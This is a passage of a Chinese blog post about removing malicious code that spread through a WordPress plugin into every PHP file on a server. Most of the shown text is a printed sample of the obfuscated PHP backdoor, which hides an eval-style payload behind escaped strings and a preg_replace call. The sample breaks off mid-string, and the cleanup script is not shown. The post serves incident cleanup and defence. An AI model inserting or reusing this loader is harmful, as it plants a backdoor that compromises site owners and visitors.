PHP实现清除wordpress里恶意代码

PHP实现清除wordpress里恶意代码

公司一些wordpress网站由于下载的插件存在恶意代码，导致整个服务器所有网站PHP文件都存在恶意代码，就写了个简单的脚本清除。

恶意代码示例

代码如下:

<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $bssaiikhvn = '61]y33]68]y34]68]y33]65]y31]53]y6d]281]y43]78]y3x66%152%x66%147%x67%42%x2c%163%x74%162%x5f%163%x70%154%x6x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x7860GB)fubfsdXA%x5c%x78!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]82]y3:]621:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4:|:**#ppde#)tutjyf%7825yy>#]D6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%x782f#@#%x5c%x5c%x7825ggg!>!#]y81]273]y>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7x7827jsv%x5c%x78256^#zsfvrx5c%x7827&6<%x5c%x787fw6*%x5c%x78825)!gj!<**2-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%%x5c%x7825:|:**t%x5c%xW~!%x5c%x7825z!>21<%x5c%x7825j=6[%x5c%x7825ww2!>5b:%x5c%x7825s:%x5cw>#]y74]273]y76]252]y85]256]y6g]257]y8!<**3-j%x5c%x7825-bubE{h%x5c%x7825)sutMSVD!-id%x5c%x7825)uqpI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,x7822:ftmbg39*56A:>:8:|:7#6ufs!|ftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)sutcvt)fubmgoj{hA!osvuc%x7824!#]y81]273]y76]258]y6g]273]#*%x5c%x7824-%x5c%x7824!>!tus%x5x782fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R3#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275j{hnpd19275fubmgoj{h7878X6<#o]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]139]271]y83]256]y78]248]y83]7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww**WYsboepn)%x5c%27pd%x5c%x78256!%x5c%x7824c%x7825c!>!%x5c%x7825i%x5c%x785c2^n%x5c%x7825<#3722!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%7825)m%x5c%x7825=*h%x5c%x78254%x5c%x785c%x5c%x7825j^%x527,*e%x5c%x7827,*d%x5c%x7827,*cmfV%x5c%x787f<*XAZASV<*w%x5c%x7825)ppde>u%x5c%x!*5!%x5c%x7827!hmg%x5c%x7825)!gj!|!*1?hmg%x5c%x7or_reporting(0); preg_replace("%x2f%ggg)(0)%x5c%x782f+*0f(-!#]y76]277]y72]265]y76]258]y6g]273]y76]271]y7d]25%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%xS["%x61%156%x75%156%x61"]=1; function f<5h%x5c%x7825%x5c%x782f#0#%x58]32M3]317]445]212]445]43]321]464]284]364]6]234]342]58]24]31#-%x5c%x)m%x5c%x7825):fmji%x5c%x7878:<##:>:h%x5c%x7825:<157%x64%145%x28%141%x72%162%x61%171%x5f%155%x61%160%x28%42%%x5c%x7825}U;y]}R;2]},;osvufs}%x5c%x7827;mnui}25Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c2fh%x5c%x7825:<**#57]38y]4tjyf%x5c%x7860opjudovg%x525bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdyU<#16,47R57,27R66,#%x5c%*#ujojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=])%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x5c%x7825!<***f%x5c%x78%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%x5c%x78256qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***b%x5#P#-#Q#-#B#-#T#-#E#-#G#-#x787fw6*%x5c%x787f_*#fmjgk4%x5*WCw*[!%x5c%x7825rN}#QwTW%xc%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#50%x2e%52%x29%57%x65","%x65%166%x61%154%x28%151%x6d%160%x6c%25)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%7827pd%x5c%x78256b%x5c%x7825!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x7825c:>1<%x5c%x7825b:>1%x5c%x782272qj%x5c%x7825)7gj6<**2qj%>!}_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*%x5c%x787f!>x7825!<*::::::-111112)eobs%x5c%x7861L3]84]y31M6]y3e]81#%x5c%x782f#SFT%x5c%x7860%x5c%x7825}X;!sp!*#opo#>>}R;msv}.;%x5c%x782f#%xc%x78b%x5c%x7825w:!>!%x5c%x78246767~6>%x5c%|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tujQeTQcOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x78!2p%x5c%x78uft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x7860ufldpt}X;%x5c%x78#%x5c%x785cq%x5c%x78257**^#zsfvr#%x5c%x785cq%x5c%x7825)uftc%x7825tpz!>!#]D6M7]K3#<%x5c%xbbT-%x5c%x7825bT-%x5c%x7825hW~%x5c%x782)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFx5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x784l}%x5c%x7827;%x5c%x7825!<*#}_;#)323ldfid>}>!%x5c%x7825tdz)%x5c%x7825ofmy%x5c%x7825,3,j%x5c%x7825>j%x5c%x782560msvd}R;*msv%x5c%x7825)}.;%x5c%x7860UQP78W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x55c%x787fw6<*K)ftpmdXA6|7**197-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x78po)##-!#~<#%x5c%x782f%x5c%x7825c%x7824-%x5c%x7824tvctus)%x5x7825)!>>%x5c%x7822!ftmbg)!gj]58y]472]37y]672]48y]#>s%x5c%x7825<#462]47y]252]18y]#>q5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5x7860opjudovg)!gj!|!*msv%x5c%x7825)}k~~~2bd%x5c%x7825!2qj%x5c%x78257-K)udfoopdXA%x54!#]y76]277]y72]265]y39]274]y85]273]y66<.4%x5c%x7860hA%x5c%x7827pd%x5c%x78256860TW~%x5c%x7824<%x5c%x78e%x5c%x78b%x5c%x7825mm)%x5c%x7825%x5c%x7878:q%x5c%x78257%x5c%x782f7#@#7%x5c%x782f7^#iubq#%x5cx5c%x7824*1<%x5c%x7825j=tj%x7825!*3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c1%x72%164") && (!isset($GLOBALS["%x61%156%x75%156%x61"])))) { $GLOBAL7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x7825:>:r7e:55946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5g!)%x5c%x7825z>>2*!%x5c%x7825z>3j%x5c%x7825!*72!%x5c%x7827!hmg%x-t.98]K4]65]D8]86]y31]278]y3f]5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x7%x5c%x7822)gj!|!*nbsbq%x5c%x7825)323ldfidk!~!<**qp%x5c%x3]65]y31]55]y85]82]y76]62]y3:]84#-!OVMM*<%x22%51%x29%51%x29%73"66~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6x7824<%x5c%x7825j,,*!|%x5c%x7824c%x7822)7gj6<*QDU%x5c%%x785c%x5c%x7825j:^!#]y84]275]y83]248]y83]256c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftc%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x78272qj%x5<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6%x5c%x782f7&%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjud7825!-uyfu%x5c%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!*uyfu%x5c%x5c%x7825)hopm3qjA)qj3hopmA%x578Bsfuvso!sboepn)%x5c%x7825epnbss-%x5c%x7825r%x5c%x78782fqp%x5c%x7825>5h%x5c%4-%x5c%x7824y7%x5c%x7824-%<*#k#)usbut%x5c%x7860cpg]273]y76]271]y7d]252]y74]256]7f_*#[k2%x5c%x7860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7tsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860860ufh%x5c%x7860fmjg}[;ldpt%x5c%x7825}K;%x5c%xx5c%x7825r%x5c%x7878<~!!%x5c%x7825s:N}#-%x5c%x7825o:W%x5c:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x7897e:56-%x5c%x7878r.985:52985c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]47825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%x5c%xPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x780#)U!%x5c%x7827{**u%x5c%x7825-fd)##Qtpz)#]341]88M4P8825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%x5c%x7825G]y6d]2